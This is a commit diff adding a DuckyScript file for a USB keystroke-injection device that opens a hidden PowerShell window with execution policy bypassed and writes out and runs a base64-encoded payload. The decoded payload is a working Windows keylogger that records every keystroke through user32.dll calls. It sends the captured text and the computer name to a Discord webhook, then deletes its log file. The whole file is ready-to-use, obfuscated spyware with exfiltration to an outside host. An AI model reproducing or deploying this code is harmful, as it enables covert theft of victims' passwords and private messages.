Add files via upload

OSINT/Keylogger from base64 to Discord.txt

@@ -0,0 +1,34 @@
+REM Title: Keylogger to Discord
+REM Author: @beigeworm
+REM Description: Uses Powershell to gather keystroke info and send it via Discord.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace WEBHOOK_GOES_HERE with your discord webhook.
+REM set $MsgInterval=1 to desired interval beetween emails (in minutes). Default is 1 minute.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM Open Powershell and start logs.
+DELAY 1000
+GUI r
+DELAY 500
+
+
+REM Remove '-W Hidden' below to show the powershell setup window.
+
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+ENTER
+DELAY 5000
+
+STRING '$MsgInterval = 1;$whuri = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force
+ENTER
+STRING $b64 = 'RG97JGFwaXAgPSAxO1N0YXJ0LVNsZWVwIDQ7JHR0cnVuID0gMTskdHN0cnQgPSBHZXQtRGF0ZTskdGVuZCA9ICR0c3RydC5hZGRtaW51dGVzKCRNc2dJbnRlcnZhbCk7IGZ1bmN0aW9uIFN0YXJ0LUxvZ3MoJFBhdGggPSAiJGVudjp0ZW1wXGNoYXJzLnR4dCIpIHskc2lncyA9IEAiDQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8sIEV4YWN0U3BlbGxpbmc9dHJ1ZSldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIHNob3J0IEdldEFzeW5jS2V5U3RhdGUoaW50IHZpcnR1YWxLZXlDb2RlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldEtleWJvYXJkU3RhdGUoYnl0ZVtdIGtleXN0YXRlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE1hcFZpcnR1YWxLZXkodWludCB1Q29kZSwgaW50IHVNYXBUeXBlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IFRvVW5pY29kZSh1aW50IHdWaXJ0S2V5LCB1aW50IHdTY2FuQ29kZSwgYnl0ZVtdIGxwa2V5c3RhdGUsIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIgcHdzekJ1ZmYsIGludCBjY2hCdWZmLCB1aW50IHdGbGFncyk7DQoiQDskQVBJID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJHNpZ3MgLU5hbWUgJ1dpbjMyJyAtTmFtZXNwYWNlIEFQSSAtUGFzc1RocnUgICA7JG51bGwgPSBOZXctSXRlbSAtUGF0aCAkUGF0aCAtSXRlbVR5cGUgRmlsZSAtRm9yY2U7dHJ5e1NsZWVwIDE7JHJ1biA9IDA7d2hpbGUgKCR0dHJ1biAtZ2UgJHJ1bikge3doaWxlICgkdGVuZCAtZ2UgJHRub3cpIHtTbGVlcCAtTWlsbGlzZWNvbmRzIDMwO2ZvciAoJGFzY2lpID0gOTsgJGFzY2lpIC1sZSAyNTQ7ICRhc2NpaSsrKSB7DQokc3RhdGUgPSAkQVBJOjpHZXRBc3luY0tleVN0YXRlKCRhc2NpaSk7IGlmICgkc3RhdGUgLWVxIC0zMjc2Nyl7JG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrOyR2aXJ0dWFsS2V5ID0gJEFQSTo6TWFwVmlydHVhbEtleSgkYXNjaWksIDMpOyRrYnN0YXRlID0gTmV3LU9iamVjdCBCeXRlW10gMjU2DQokY2hlY2trYnN0YXRlID0gJEFQSTo6R2V0S2V5Ym9hcmRTdGF0ZSgka2JzdGF0ZSk7JG15Y2hhciA9IE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXI7JHN1Y2Nlc3MgPSAkQVBJOjpUb1VuaWNvZGUoJGFzY2lpLCAkdmlydHVhbEtleSwgJGtic3RhdGUsICRteWNoYXIsICRteWNoYXIuQ2FwYWNpdHksIDApDQppZiAoJHN1Y2Nlc3MpIHtbU3lzdGVtLklPLkZpbGVdOjpBcHBlbmRBbGxUZXh0KCRQYXRoLCAkbXljaGFyLCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlKX19fSR0bm93ID0gR2V0LURhdGV9OyRtc2cgPSBHZXQtQ29udGVudCAtUGF0aCAkUGF0aCAtUmF3DQokZXNjbXNnID0gJG1zZyAtcmVwbGFjZSAnWyY8Pl0nLCB7JGFyZ3NbMF0uVmFsdWUuUmVwbGFjZSgnJicsICcmYW1wOycpLlJlcGxhY2UoJzwnLCAnJmx0OycpLlJlcGxhY2UoJz4nLCAnJmd0OycpfTskanNvbiA9IEB7InVzZXJuYW1lIiA9ICIkZW52OkNPTVBVVEVSTkFNRSIgOyAiY29udGVudCIgPSAkZXNjbXNnfSB8IENvbnZlcnRUby1Kc29uDQpTbGVlcCAxO0ludm9rZS1SZXN0TWV0aG9kIC1VcmkgJHdodXJpIC1NZXRob2QgUG9zdCAtQ29udGVudFR5cGUgImFwcGxpY2F0aW9uL2pzb24iIC1Cb2R5ICRqc29uO1NsZWVwIDE7UmVtb3ZlLUl0ZW0gLVBhdGggJFBhdGggLWZvcmNlfX1maW5hbGx5e319U3RhcnQtTG9nc31XaGlsZSAoJGFwaXAgLWxlIDUp'
+ENTER
+STRING $decodedFile = [System.Convert]::FromBase64String($b64);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedFile);$decodedText | Out-File -FilePath "$env:temp/a.ps1" -Append
+ENTER
+STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force
+ENTER
+STRING
+ENTER